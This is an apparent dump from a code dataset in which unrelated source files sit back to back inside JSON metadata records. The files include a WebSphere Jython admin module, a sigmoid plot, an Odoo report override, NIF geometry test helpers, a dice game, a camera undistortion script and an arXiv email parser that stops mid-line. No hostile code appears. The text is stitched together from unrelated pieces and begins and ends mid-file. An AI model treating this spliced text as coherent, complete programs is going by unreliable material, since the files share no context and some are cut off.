The Java Dumps and Core generation can't be performed.\")\r\n else:\r\n jvm = AdminControl.completeObjectName(\"type=JVM,node=\"+nodeName+\",process=\"+serverName+\",*\")\r\n AdminControl.invoke(jvm, 'dumpThreads')\r\n AdminControl.invoke(jvm, 'generateHeapDump')\r\n AdminControl.invoke(jvm, 'generateSystemDump')\r\n logging.info(\" Java Dumps and Cores were generated successfully\")\r\n \r\n def loadProperty(self, node, server):\r\n SCRIPT_NAME = 'JavaProcessDef.properties'\r\n JPD_FILE_PATH = self.workbook.NODE_PATH+'/'+node.getName()+'/'+server.getName()+'/'+SCRIPT_NAME\r\n \r\n jpd = server.getJavaProcessDef()\r\n mp = jpd.getMonitoringPolicy()\r\n \r\n config = ConfigParser.ConfigParser()\r\n config.optionxform = str\r\n if( os.path.exists(self.workbook.DEPLOYMENT_PATH+\"/\"+SCRIPT_NAME) ):\r\n config.read(self.workbook.DEPLOYMENT_PATH+\"/\"+SCRIPT_NAME)\r\n elif( os.path.exists(JPD_FILE_PATH) ): \r\n config.read(JPD_FILE_PATH)\r\n else:\r\n logging.info(\"JavaProcessDef.properties doesn't exist\" )\r\n return 0\r\n \r\n runAsGroup = config.get('JavaProcessDef','runAsGroup')\r\n runAsUser = config.get('JavaProcessDef','runAsUser')\r\n umask = config.get('JavaProcessDef','umask')\r\n runInProcessGroup = config.get('JavaProcessDef','runInProcessGroup')\r\n processPriority = config.get('JavaProcessDef','processPriority')\r\n\r\n jpd.setUmask(umask)\r\n jpd.setRunAsGroup(runAsGroup) \r\n jpd.setRunAsUser(runAsUser)\r\n jpd.setRunInProcessGroup(runInProcessGroup)\r\n jpd.setProcessPriority(processPriority)\r\n\r\n stderrFilename = config.get('OutputRedirect','stderrFilename')\r\n stdoutFilename = config.get('OutputRedirect','stdoutFilename')\r\n \r\n jpd.setStderrFilename(stderrFilename)\r\n jpd.setStdoutFilename(stdoutFilename)\r\n \r\n autoRestart = config.get('MonitoringPolicy','autoRestart')\r\n maximumStartupAttempts = config.get('MonitoringPolicy','maximumStartupAttempts')\r\n nodeRestartState = config.get('MonitoringPolicy','nodeRestartState')\r\n pingInterval = config.get('MonitoringPolicy','pingInterval')\r\n pingTimeout = config.get('MonitoringPolicy','pingTimeout')\r\n \r\n mp.setAutoRestart(autoRestart)\r\n mp.setMaximumStartupAttempts(maximumStartupAttempts)\r\n mp.setNodeRestartState(nodeRestartState)\r\n mp.setPingInterval(pingInterval)\r\n mp.setPingTimeout(pingTimeout)\r\n \r\n environmentList = ArrayList()\r\n for option in config.options('EnvironmentEntries'):\r\n value = config.get('EnvironmentEntries',option)\r\n \r\n customProperty = CustomProperty()\r\n customProperty.setName(option)\r\n customProperty.setValue(value)\r\n \r\n environmentList.add(customProperty)\r\n \r\n jpd.setEnvironmentEntries(environmentList) \r\n \r\n return 1\r\n \r\n def loadBean(self, nodeName, serverName, isDebug):\r\n serverID = AdminConfig.getid(\"/Node:\"+nodeName+\"/Server:\"+serverName)\r\n javaProcessDefArray = AdminConfig.list('JavaProcessDef',serverID)\r\n javaProcessDefArray = AdminUtil.convertToList(javaProcessDefArray)\r\n javaProcessDefID = javaProcessDefArray[0]\r\n \r\n if( len(javaProcessDefArray) > 1 ):\r\n if( isDebug ):\r\n logging.info( \"+ JavaProcessDef - ERROR - There is more than 1 JavaProcessDef Component\" )\r\n outputRedirectID = AdminConfig.list('OutputRedirect',javaProcessDefArray[1])\r\n if( len(outputRedirectID) > 0 ):\r\n javaProcessDefID = javaProcessDefArray[1]\r\n else: \r\n if( isDebug ):\r\n logging.info( \"+ JavaProcessDef - \" )\r\n \r\n # execution \r\n executionID = AdminConfig.showAttribute(javaProcessDefID,'execution')\r\n runAsGroupAttr = 
AdminConfig.showAttribute(executionID,'runAsGroup')\r\n runAsUserAttr = AdminConfig.showAttribute(executionID,'runAsUser')\r\n runInProcessGroupAttr = AdminConfig.showAttribute(executionID,'runInProcessGroup')\r\n processPriorityAttr = AdminConfig.showAttribute(executionID,'processPriority')\r\n umaskAttr = AdminConfig.showAttribute(executionID,'umask')\r\n \r\n # OutputRedirect \r\n outputRedirectID = AdminConfig.list('OutputRedirect',serverID)\r\n stderrFilenameAttr = AdminConfig.showAttribute(outputRedirectID,'stderrFilename')\r\n stdoutFilenameAttr = AdminConfig.showAttribute(outputRedirectID,'stdoutFilename')\r\n \r\n javaProcessDef = JavaProcessDef() \r\n javaProcessDef.setRunAsGroup(runAsGroupAttr)\r\n javaProcessDef.setRunAsUser(runAsUserAttr)\r\n javaProcessDef.setUmask(umaskAttr)\r\n javaProcessDef.setRunInProcessGroup(runInProcessGroupAttr)\r\n javaProcessDef.setProcessPriority(processPriorityAttr)\r\n \r\n javaProcessDef.setStderrFilename(stderrFilenameAttr)\r\n javaProcessDef.setStdoutFilename(stdoutFilenameAttr)\r\n\r\n if( isDebug ):\r\n logging.info( \" OutputRedirect - Synchronized\" )\r\n \r\n environmentArray = AdminConfig.showAttribute(javaProcessDefID,'environment')\r\n environmentArray = AdminUtil.convertToList(environmentArray)\r\n for environmentID in environmentArray:\r\n customProperty = CustomProperty()\r\n nameProp = AdminConfig.showAttribute(environmentID,'name')\r\n reqProp = AdminConfig.showAttribute(environmentID,'required')\r\n valueProp = AdminConfig.showAttribute(environmentID,'value')\r\n \r\n customProperty.setName( nameProp )\r\n customProperty.setRequired( reqProp )\r\n customProperty.setValue( valueProp )\r\n \r\n javaProcessDef.addEnvironmentEntry(customProperty) \r\n \r\n if( isDebug ):\r\n logging.info( \" Environment Entries - Synchronized\" )\r\n \r\n ##################################\r\n # START JavaVirtualMachine\r\n ################################## \r\n adminJavaVirtualMachine = AdminJavaVirtualMachine(self.workbook)\r\n adminJavaVirtualMachine.loadBean(nodeName, serverName, javaProcessDef, isDebug)\r\n # END javaVirtualMachine\r\n \r\n ##################################\r\n # START MonitoringPolicy\r\n ################################## \r\n monitoringPolicyID = AdminConfig.list('MonitoringPolicy',serverID)\r\n autoRestartAttr = AdminConfig.showAttribute(monitoringPolicyID,'autoRestart')\r\n maximumStartupAttemptsAttr = AdminConfig.showAttribute(monitoringPolicyID,'maximumStartupAttempts')\r\n nodeRestartStateAttr = AdminConfig.showAttribute(monitoringPolicyID,'nodeRestartState')\r\n pingIntervalAttr = AdminConfig.showAttribute(monitoringPolicyID,'pingInterval')\r\n pingTimeoutAttr = AdminConfig.showAttribute(monitoringPolicyID,'pingTimeout')\r\n \r\n monitoringPolicy = MonitoringPolicy()\r\n monitoringPolicy.setAutoRestart(autoRestartAttr)\r\n monitoringPolicy.setMaximumStartupAttempts(maximumStartupAttemptsAttr)\r\n monitoringPolicy.setNodeRestartState(nodeRestartStateAttr)\r\n monitoringPolicy.setPingInterval(pingIntervalAttr)\r\n monitoringPolicy.setPingTimeout(pingTimeoutAttr)\r\n javaProcessDef.setMonitoringPolicy(monitoringPolicy)\r\n \r\n if( isDebug ):\r\n logging.info( \" MonitoringPolicy - Synchronized\" )\r\n\r\n #END MonitoringPolicy\r\n \r\n return javaProcessDef\r\n \r\n\r\n","sub_path":"jython/ext/AdminJavaProcessDef.py","file_name":"AdminJavaProcessDef.py","file_ext":"py","file_size_in_byte":16818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
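loadProperty() in the wsadmin module above sets config.optionxform = str before reading, and that line is load-bearing: without it ConfigParser lower-cases every option name, which corrupts case-sensitive keys such as the environment entries (the script itself notes a lower-casing bug in the property base). A minimal pure-Python 3 demonstration (the Jython original imports the Python 2 ConfigParser module; the INI content here is made up):

# Sketch: ConfigParser lower-cases option names unless optionxform is overridden.
import configparser

INI = "[EnvironmentEntries]\nJAVA_DUMP_OPTS = ONANYSIGNAL(JAVADUMP)\n"

default = configparser.ConfigParser()
default.read_string(INI)
print(default.options("EnvironmentEntries"))      # ['java_dump_opts']

preserving = configparser.ConfigParser()
preserving.optionxform = str                      # keep case, as in loadProperty()
preserving.read_string(INI)
print(preserving.options("EnvironmentEntries"))   # ['JAVA_DUMP_OPTS']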
+{"seq_id":"491481973","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.arange(-10, 10, 0.1)\nf = 1 / (1 + np.exp(-x))\nplt.xlabel('x')\nplt.ylabel('f(x)')\nplt.plot(x, f)\nplt.axhline(0.5, color='black')\nplt.axvline(0, color='black')\nplt.show()","sub_path":"demo17.py","file_name":"demo17.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"197703495","text":"# -*- coding: utf-8 -*-\n# © 2016 Comunitea\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom openerp import models, fields, api, exceptions, _\nfrom openerp.tools import html_escape as escape\nfrom openerp.addons.base.ir.ir_qweb import HTMLSafe\n\n\nclass Contact(models.AbstractModel):\n _inherit = 'ir.qweb.field.contact'\n\n def record_to_html(self, cr, uid, field_name, record, options=None, context=None):\n if context is None:\n context = {}\n\n if options is None:\n options = {}\n opf = options.get('fields') or [\"name\", \"address\", \"phone\", \"mobile\", \"fax\", \"email\"]\n\n value_rec = record[field_name]\n if not value_rec:\n return None\n value_rec = value_rec.sudo().with_context(show_address=True)\n value = value_rec.name_get()[0][1]\n\n val = {\n 'name': value.split(\"\\n\")[0],\n 'address': escape(\" \".join(value.split(\"\\n\")[1:])),\n 'phone': value_rec.phone,\n 'mobile': value_rec.mobile,\n 'fax': value_rec.fax,\n 'city': value_rec.city,\n 'country_id': value_rec.country_id.display_name,\n 'website': value_rec.website,\n 'email': value_rec.email,\n 'vat': value_rec.vat,\n 'fields': opf,\n 'object': value_rec,\n 'options': options\n }\n val['address'] = val['address'].replace(val['country_id'], '')\n html = self.pool[\"ir.ui.view\"].render(cr, uid, \"base.contact\", val, engine='ir.qweb', context=context).decode('utf8')\n\n return HTMLSafe(html)\n","sub_path":"project-addons/custom_report/models/ir_qweb.py","file_name":"ir_qweb.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631538843","text":"from datetime import datetime\nfrom datetime import date\nfrom pandas import Timedelta\n\n\ndef __returnDate__(year, month, day):\n weekend = ['(월)', '(화)', '(수)', '(목)', '(금)', '(토)', '(일)']\n idx = date(year, month, day).weekday()\n return weekend[idx]\n\n\ndef __returnDayCount__(year, month):\n if month == 12:\n current_month = datetime(year, month, 1, 0, 0, 0)\n next_month = datetime(year + 1, 1, 1, 0, 0, 0)\n days = Timedelta(next_month - current_month).days\n else:\n current_month = datetime(year, month, 1, 0, 0, 0)\n next_month = datetime(year, month + 1, 1, 0, 0, 0)\n days = Timedelta(next_month - current_month).days\n return days\n\n\ndef returnDateList(year):\n year = int(year)\n dateList = []\n for month in range(1, 13):\n days = __returnDayCount__(year, month) + 1\n for day in range(1, days):\n textMonth = f\"0{month}\" if month < 10 else f\"{month}\"\n textDay = f\"0{day}\" if day < 10 else f\"{day}\"\n textDate = __returnDate__(year, month, day)\n dateList.append(f\"{textMonth}/{textDay}{textDate}\")\n return dateList\n","sub_path":"method/dateList.py","file_name":"dateList.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"235165003","text":"from PyQt5.QtWidgets import *\nimport sys\n\n\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n title = \"Tile of 
window\"\n self.setWindowTitle(title)\n self.setGeometry(800, 400, 500, 300)\n self.show()\n\n\nApp = QApplication(sys.argv)\nwindow = Window()\nsys.exit(App.exec())\n","sub_path":"pythongui/firstqt5.py","file_name":"firstqt5.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312395069","text":"\"\"\"Helper functions to create and test pyffi-based geometry blocks\"\"\"\n\n# ***** BEGIN LICENSE BLOCK *****\n# \n# Copyright © 2005-2013, NIF File Format Library and Tools contributors.\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# \n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# \n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# \n# * Neither the name of the NIF File Format Library and Tools\n# project nor the names of its contributors may be used to endorse\n# or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# ***** END LICENSE BLOCK *****\n\nimport math\nimport mathutils\n\nimport nose\n\nfrom pyffi.utils.withref import ref\nfrom pyffi.formats.nif import NifFormat\n\n\n\"\"\"Vertex coordinates for testing.\"\"\"\nb_verts = {\n (-7.5, 7.5, 3.5),\n (7.5, 3.75, 1.75),\n (7.5, -3.75, -1.75),\n (7.5, 3.75, -1.75),\n (-7.5, 7.5, -3.5),\n (-7.5, -7.5, 3.5),\n (7.5, -3.75, 1.75),\n (-7.5, -7.5, -3.5),\n }\n\n\ndef n_create_blocks(n_data):\n n_ninode_1 = NifFormat.NiNode()\n n_nitrishape_1 = NifFormat.NiTriShape()\n n_nitrishapedata_1 = NifFormat.NiTriShapeData()\n n_data.roots = [n_ninode_1]\n\n with ref(n_ninode_1) as n_ninode:\n n_ninode.name = b'Scene Root'\n n_ninode.flags = 14\n with ref(n_ninode.rotation) as n_matrix33:\n n_matrix33.m_11 = 1\n n_matrix33.m_22 = 1\n n_matrix33.m_33 = 1\n n_ninode.scale = 1\n n_ninode.num_children = 1\n n_ninode.children.update_size()\n n_ninode.children[0] = n_nitrishape_1\n \n with ref(n_nitrishape_1) as n_nitrishape:\n n_nitrishape.name = b'Cube'\n n_nitrishape.flags = 14\n with ref(n_nitrishape.translation) as n_vector3:\n n_vector3.x = 20\n n_vector3.y = 20\n n_vector3.z = 20\n with ref(n_nitrishape.rotation) as n_matrix33:\n n_matrix33.m_11 = 0.0\n n_matrix33.m_21 = -0.5\n n_matrix33.m_31 = 0.866025\n n_matrix33.m_12 = 0.866025\n n_matrix33.m_22 = -0.433013\n n_matrix33.m_32 = -0.25\n n_matrix33.m_13 = 0.5\n n_matrix33.m_23 = 0.75\n 
n_matrix33.m_33 = 0.433012\n assert(n_matrix33.is_rotation()) # make sure in case we change values:\n n_nitrishape.scale = 0.75\n n_nitrishape.data = n_nitrishapedata_1\n \n with ref(n_nitrishapedata_1) as n_nitrishapedata:\n n_nitrishapedata.has_vertices = True\n n_nitrishapedata.num_vertices = 8\n n_nitrishapedata.vertices.update_size()\n with ref(n_nitrishapedata.vertices[0]) as n_vector3:\n n_vector3.x = 7.5\n n_vector3.y = 3.75\n n_vector3.z = -1.75\n with ref(n_nitrishapedata.vertices[1]) as n_vector3:\n n_vector3.x = 7.5\n n_vector3.y = -3.75\n n_vector3.z = -1.75\n with ref(n_nitrishapedata.vertices[2]) as n_vector3:\n n_vector3.x = -7.5\n n_vector3.y = -7.5\n n_vector3.z = -3.5\n with ref(n_nitrishapedata.vertices[3]) as n_vector3:\n n_vector3.x = -7.5\n n_vector3.y = 7.5\n n_vector3.z = -3.5\n with ref(n_nitrishapedata.vertices[4]) as n_vector3:\n n_vector3.x = 7.5\n n_vector3.y = 3.75\n n_vector3.z = 1.75\n with ref(n_nitrishapedata.vertices[5]) as n_vector3:\n n_vector3.x = -7.5\n n_vector3.y = 7.5\n n_vector3.z = 3.5\n with ref(n_nitrishapedata.vertices[6]) as n_vector3:\n n_vector3.x = -7.5\n n_vector3.y = -7.5\n n_vector3.z = 3.5\n with ref(n_nitrishapedata.vertices[7]) as n_vector3:\n n_vector3.x = 7.5\n n_vector3.y = -3.75\n n_vector3.z = 1.75\n \n n_nitrishapedata.has_normals = True\n n_nitrishapedata.normals.update_size()\n with ref(n_nitrishapedata.normals[0]) as n_vector3:\n n_vector3.x = 0.669057\n n_vector3.y = 0.4991\n n_vector3.z = -0.550676\n with ref(n_nitrishapedata.normals[1]) as n_vector3:\n n_vector3.x = 0.669057\n n_vector3.y = -0.4991\n n_vector3.z = -0.550676\n with ref(n_nitrishapedata.normals[2]) as n_vector3:\n n_vector3.x = -0.481826\n n_vector3.y = -0.64098\n n_vector3.z = -0.59743\n with ref(n_nitrishapedata.normals[3]) as n_vector3:\n n_vector3.x = -0.481826\n n_vector3.y = 0.64098\n n_vector3.z = -0.59743\n with ref(n_nitrishapedata.normals[4]) as n_vector3:\n n_vector3.x = 0.669057\n n_vector3.y = 0.4991\n n_vector3.z = 0.550676\n with ref(n_nitrishapedata.normals[5]) as n_vector3:\n n_vector3.x = -0.481826\n n_vector3.y = 0.64098\n n_vector3.z = 0.59743\n with ref(n_nitrishapedata.normals[6]) as n_vector3:\n n_vector3.x = -0.481826\n n_vector3.y = -0.64098\n n_vector3.z = 0.59743\n with ref(n_nitrishapedata.normals[7]) as n_vector3:\n n_vector3.x = 0.669027\n n_vector3.y = -0.4991\n n_vector3.z = 0.550676\n \n with ref(n_nitrishapedata.center) as n_vector3:\n n_vector3.x = 4.76837e-07\n n_vector3.y = 2.14577e-06\n \n n_nitrishapedata.radius = 11.1692\n n_nitrishapedata.consistency_flags = NifFormat.ConsistencyType.CT_STATIC\n \n n_nitrishapedata.num_triangles = 12\n n_nitrishapedata.num_triangle_points = 36\n n_nitrishapedata.has_triangles = True\n n_nitrishapedata.triangles.update_size()\n with ref(n_nitrishapedata.triangles[0]) as n_triangle:\n n_triangle.v_2 = 1\n n_triangle.v_3 = 2\n with ref(n_nitrishapedata.triangles[1]) as n_triangle:\n n_triangle.v_2 = 2\n n_triangle.v_3 = 3\n with ref(n_nitrishapedata.triangles[2]) as n_triangle:\n n_triangle.v_1 = 4\n n_triangle.v_2 = 5\n n_triangle.v_3 = 6\n with ref(n_nitrishapedata.triangles[3]) as n_triangle:\n n_triangle.v_1 = 4\n n_triangle.v_2 = 6\n n_triangle.v_3 = 7\n with ref(n_nitrishapedata.triangles[4]) as n_triangle:\n n_triangle.v_2 = 4\n n_triangle.v_3 = 7\n with ref(n_nitrishapedata.triangles[5]) as n_triangle:\n n_triangle.v_2 = 7\n n_triangle.v_3 = 1\n with ref(n_nitrishapedata.triangles[6]) as n_triangle:\n n_triangle.v_1 = 1\n n_triangle.v_2 = 7\n n_triangle.v_3 = 6\n with 
ref(n_nitrishapedata.triangles[7]) as n_triangle:\n n_triangle.v_1 = 1\n n_triangle.v_2 = 6\n n_triangle.v_3 = 2\n with ref(n_nitrishapedata.triangles[8]) as n_triangle:\n n_triangle.v_1 = 2\n n_triangle.v_2 = 6\n n_triangle.v_3 = 5\n with ref(n_nitrishapedata.triangles[9]) as n_triangle:\n n_triangle.v_1 = 2\n n_triangle.v_2 = 5\n n_triangle.v_3 = 3\n with ref(n_nitrishapedata.triangles[10]) as n_triangle:\n n_triangle.v_1 = 4\n n_triangle.v_3 = 3\n with ref(n_nitrishapedata.triangles[11]) as n_triangle:\n n_triangle.v_1 = 4\n n_triangle.v_2 = 3\n n_triangle.v_3 = 5\n return n_data\n\ndef n_check_trishape(n_trishape):\n nose.tools.assert_is_instance(n_trishape, NifFormat.NiTriShape)\n n_check_transform(n_trishape)\n \n n_trishapedata = n_trishape.data\n n_check_trishape_data(n_trishapedata)\n n_check_8_vertices(n_trishapedata)\n\ndef n_check_transform(n_trishape): \n nose.tools.assert_equal(n_trishape.translation.as_tuple(),(20.0, 20.0, 20.0)) # location\n \n n_rot_eul = mathutils.Matrix(n_trishape.rotation.as_tuple()).to_euler()\n nose.tools.assert_equal((n_rot_eul.x - math.radians(30.0)) < NifFormat.EPSILON, True) # x rotation\n nose.tools.assert_equal((n_rot_eul.y - math.radians(60.0)) < NifFormat.EPSILON, True) # y rotation\n nose.tools.assert_equal((n_rot_eul.z - math.radians(90.0)) < NifFormat.EPSILON, True) # z rotation\n \n nose.tools.assert_equal(n_trishape.scale - 0.75 < NifFormat.EPSILON, True) # scale\n\ndef n_check_trishape_data(n_trishape_data):\n nose.tools.assert_true(n_trishape_data.has_vertices)\n \n nose.tools.assert_equal(n_trishape_data.num_triangles, 12)\n \n #TODO FIXME\n # nose.tools.assert_equal(n_trishape_data.consistency_flags, NifFormat.ConsistencyType.CT_STATIC)\n \n \ndef n_check_8_vertices(n_trishape_data):\n nose.tools.assert_equal(n_trishape_data.num_vertices, 8)\n verts = {\n tuple(round(co, 4) for co in vert.as_list())\n for vert in n_trishape_data.vertices\n }\n nose.tools.assert_set_equal(verts, b_verts)\n \n #See Issue #26\n #nose.tools.assert_true(n_trishape_data.has_normals)\n #nose.tools.assert_equal(n_trishape_data.num_normals, 8)\n\n \n #TODO: Additional checks needed.\n \n #TriData\n # Flags: blender - Continue, Maya - Triangles, Pyffi - Bound.\n # radius:\n","sub_path":"testframework/integration/geometry/trishape/n_gen_geometry.py","file_name":"n_gen_geometry.py","file_ext":"py","file_size_in_byte":10407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"505079988","text":"import sys\n\t\ndef countarr(jolts):\n\tpaths = [1]\n\tfor i in range(1, len(jolts)):\n\t\tp = paths[i-1]\t\n\t\tj = i-2\n\t\twhile j >= 0 and jolts[i] - jolts[j] <= 3:\n\t\t\tp += paths[j]\n\t\t\tj -= 1\n\t\tpaths.append(p)\n\n\treturn paths[-1]\n\njolts = []\nones = 0\nthrees = 1\nfor line in sys.stdin:\n\tjolts.append(int(line))\n\njolts.sort()\n\nprint(jolts)\n\ni = 0\nfor j in jolts:\n\tif j-i == 1:\n\t\tones += 1\n\telif j-i == 3:\n\t\tthrees +=1\n\ti = j\nprint(ones*threes)\n\njolts.insert(0,0)\njolts.append(max(jolts)+3)\nprint(countarr(jolts))","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"603810877","text":"import random\nimport csv\n\ndef loadObstacles():\n# start by trying to load our data file.\n try:\n f = open(\"obstacles.csv\", \"r\")\n\n except IOError as e:\n return []\n\n else:\n print(\"Obstacles file opened successfully\")\n obstacles = []\n for line in 
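countarr in the adapter-chain record above is the standard dynamic program for this puzzle: paths[i] is the sum of paths[j] over every earlier adapter within 3 jolts. A self-contained sketch that also folds in the outlet (0) and device (max + 3) endpoints the record appends before calling it; the sample chain is the widely used small example, whose answer is 8:

# Sketch of the countarr() dynamic program, endpoints included.
def count_arrangements(jolts):
    chain = [0] + sorted(jolts) + [max(jolts) + 3]
    paths = [1]                       # one way to 'reach' the outlet
    for i in range(1, len(chain)):
        total = 0
        j = i - 1
        while j >= 0 and chain[i] - chain[j] <= 3:
            total += paths[j]
            j -= 1
        paths.append(total)
    return paths[-1]

print(count_arrangements([16, 10, 15, 5, 1, 11, 7, 19, 6, 12, 4]))  # 8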
csv.reader(f):\n obstacles.append(line)\n f.close()\n return obstacles\n\ndef throwDice(player):\n d1 = random.randint(1,6)\n d2 = random.randint(1,6)\n #d1 = int(input(\"First dice: \"))\n #d2 = int(input(\"Second dice: \"))\n\n if d1 == d2:\n score = -(d1+d2)\n print (player + ': double ' + str(d1) + ': returns ' + str(score))\n else:\n score = d1+d2\n print (player +' ' +str(d1) + ',' +str(d2) +': returns ' +str(score))\n return score\n\ndef checkForObstacles(position, player, obstacles):\n for obstacle in obstacles:\n if int(obstacle[0]) == position:\n print (player +\": obstacle @ \" +str(position) +\", value \" + obstacle[1])\n return position + int(obstacle[1])\n return position\n\ndef turn(position, player, obstacles):\n position = position + throwDice(player)\n position = checkForObstacles(position, player, obstacles)\n if position < 1:\n position = 1\n return position\n\ndef winner(position):\n if position > 48:\n return True\n else:\n return False\n\n\n# program starts here\n# Players A and B both start in square 1\nA = 1\nB = 1\n\nobstacles = loadObstacles()\nprint(obstacles)\n\nwhile True:\n A = turn(A, \"A\", obstacles)\n if winner(A):\n print ('Player A scored ' + str(A) + ', Player A has won')\n break\n else:\n print ('Player A new position: ' + str(A))\n B = turn(B, \"B\", obstacles)\n if winner(B):\n print ('Player B scored ' + str(B) + ', Player B has won')\n break\n else:\n print ('Player B new position: ' + str(B))\n","sub_path":"python/3/codeWithoutGrid.py","file_name":"codeWithoutGrid.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"115668255","text":"import pickle, glob\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n# Read in the saved objpoints and imgpoints\nDIR = './camera_cal/'\nPklF = DIR+\"cameraCalibPickle.p\"\nx,y = 9,6\n\ndist_pickle = pickle.load( open( PklF, \"rb\" ) )\ndist = dist_pickle[\"dist\"]\nmtx = dist_pickle[\"mtx\"]\n\nimages = glob.glob('./test_images/test*.jpg')[:]\nfor idx, fnm in enumerate(images):\n print(idx, fnm)\n Img = cv2.imread(fnm) #DIR+'test_image1.jpg')\n undistort = cv2.undistort(Img, mtx, dist, None, mtx)\n\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))\n f.tight_layout()\n ax1.imshow(Img)\n ax1.set_title('Original Image', fontsize=50)\n ax2.imshow(undistort)\n ax2.set_title('Undistorted Image', fontsize=50)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show()\n","sub_path":"undistortTestImgs.py","file_name":"undistortTestImgs.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"43854458","text":"'''\narxiv.py\nDaniel Mentiplay, 2018.\n'''\n\nimport urllib.request\n\nclass Arxiv:\n '''\n Contains a list of entries from my daily arXiv email.\n '''\n\n def __init__(self):\n\n self.date = None\n self.entries = None\n self.categories = None\n\n self._read_data_from_file()\n self._get_categories()\n\n def _read_data_from_file(self):\n\n entries = list()\n\n filename = 'original_msg.txt'\n\n in_entries = False\n in_abstract = False\n in_title = False\n in_authors = False\n in_comments = False\n\n keys = ['label', 'date', 'title', 'comments', 'categories', 'abstract',\n 'journal-ref', 'doi']\n\n with open(filename, 'r') as file:\n\n prevLine = ''\n\n for line in file:\n line = line.rstrip('\\n')\n\n if line == 78*'-':\n in_entries = True\n continue\n\n if not 
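checkForObstacles in the board-game record above scans the whole obstacle list on every turn and re-parses the integers each time. Loading the CSV into a dict keyed by square makes the lookup O(1) and does the conversion once. A sketch with made-up rows (square, offset), using io.StringIO so it runs without the obstacles.csv file:

# Sketch: obstacles as {square: offset} instead of a list of string rows.
import csv
import io

SAMPLE = "5,-3\n12,4\n"  # assumed rows: square, offset

def load_obstacles(fh):
    return {int(square): int(offset) for square, offset in csv.reader(fh)}

obstacles = load_obstacles(io.StringIO(SAMPLE))

def check(position):
    return position + obstacles.get(position, 0)

print(check(5))   # 2
print(check(7))   # 7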
in_entries:\n continue\n\n if ' received from' in line:\n words = line.split(' ')\n self.date = words[3]\n\n if '%%--%%' in line:\n break\n\n if 'arXiv:' in line:\n entry = {key: None for key in keys}\n entry['label'] = line[:16]\n continue\n\n if 'Date:' in line:\n words = line.split(' ')\n entry['date'] = words[2] + ' ' + words[3] + ' ' + words[4]\n continue\n\n if 'Title:' in line:\n in_title = True\n entry['title'] = line[7:]\n continue\n\n if in_title:\n if line[0:2] == ' ':\n entry['title'] += line[1:]\n continue\n else:\n in_title = False\n\n if 'Authors:' in line:\n in_authors = True\n authors_line = line[9:]\n continue\n\n if in_authors:\n if line[0:2] == ' ':\n authors_line += line[1:]\n continue\n else:\n entry['authors'] = authors_line.split(', ')\n in_authors = False\n\n if 'Categories:' in line:\n entry['categories'] = line[12:].split(' ')\n continue\n\n if 'Comments:' in line:\n in_comments = True\n entry['comments'] = line[10:]\n continue\n\n if in_comments:\n if line[0:2] == ' ':\n entry['comments'] = entry['comments'] + ' ' + line\n continue\n else:\n in_comments = False\n\n if 'DOI:' in line:\n entry['doi'] = line[5:]\n continue\n\n if 'Journal-ref:' in line:\n entry['journal-ref'] = line[13:]\n continue\n\n if prevLine == r'\\\\' and line[0:2] == ' ':\n in_abstract = True\n entry['abstract'] = line[2:]\n continue\n\n if in_abstract:\n if line[0:2] != r'\\\\':\n entry['abstract'] += ' ' + line\n continue\n else:\n in_abstract = False\n words = line.split(' ')\n entry['url'] = words[2]\n entries.append(entry)\n continue\n\n prevLine = line\n\n self.entries = entries\n\n def _get_categories(self):\n '''Put all categories into a set'''\n\n categories = set()\n for entry in self.entries:\n for category in entry['categories']:\n categories.add(category)\n\n self.categories = categories\n\n def get_articles_from_category(self, category):\n '''Put all article labels with a particular category into a set'''\n\n if category not in 